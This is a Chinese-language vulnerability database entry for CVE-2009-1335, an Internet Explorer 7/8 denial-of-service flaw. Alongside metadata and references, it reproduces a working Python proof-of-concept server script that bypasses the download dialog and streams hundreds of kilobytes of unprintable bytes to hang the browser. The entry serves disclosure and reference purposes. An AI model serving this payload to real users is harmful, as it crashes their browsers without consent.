Microsoft Internet Explorer文件下载拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117565 漏洞类型 Failure to Handle Exceptional Conditions
发布时间 2009-04-11 更新时间 2009-04-24
CVE编号 CVE-2009-1335 CNNVD-ID CNNVD-200904-376
漏洞平台 Windows CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/32902
https://www.securityfocus.com/bid/34478
https://cxsecurity.com/issue/WLB-2009040202
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-376
|漏洞详情
WindowsXP和Vista上的MicrosoftInternetExplorer7和8版本允许远程攻击者借助一个大的文档,引起拒绝服务攻击(应用程序挂起)。该文档由不可打印的字符组成,又称MSRC9011jr。
|漏洞EXP
source: http://www.securityfocus.com/bid/34478/info

Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability.

Successful exploits can allow attackers to hang the affected browser, resulting in denial-of-service conditions. 

#/usr/bin/env python
import sys
import random

CHAR_SET = [chr(x) for x in range(0x20)]
CHAR_SET += [chr(x) for x in range(128, 256)]

def send_file():
      l = 800000 + 4096
      print "Content-Type: text/plain"
      print "Content-Length: %d" % l
      print "Cache-Control: no-cache, no-store, must-revalidate"
      # this is not standardized, but use it anyway
      print "Pragma: no-cache"
      print ""
      # bypass IE download dialog
      sys.stdout.write("a" * 4096)
      # print junks
      for i in xrange(l):
              sys.stdout.write(random.choice(CHAR_SET))
      sys.exit()

send_file()
|受影响的产品
Microsoft Internet Explorer 8 + Microsoft Windows 7 + Microsoft Windows 7 + Microsoft Windows 7 for 32-bit Systems
|参考资料

来源:XF
名称:ie-unprintable-dos(50350)
链接:http://xforce.iss.net/xforce/xfdb/50350
来源:BID
名称:34478
链接:http://www.securityfocus.com/bid/34478
来源:BUGTRAQ
名称:20090411[BMSA2009-04]RemoteDoSinInternetExplorer
链接:http://www.securityfocus.com/archive/1/archive/1/502617/100/0/threaded
来源:FULLDISC
名称:20090411[BMSA2009-04]RemoteDoSinInternetExplorer
链接:http://archives.neohapsis.com/archives/fulldisclosure/2009-04/0111.html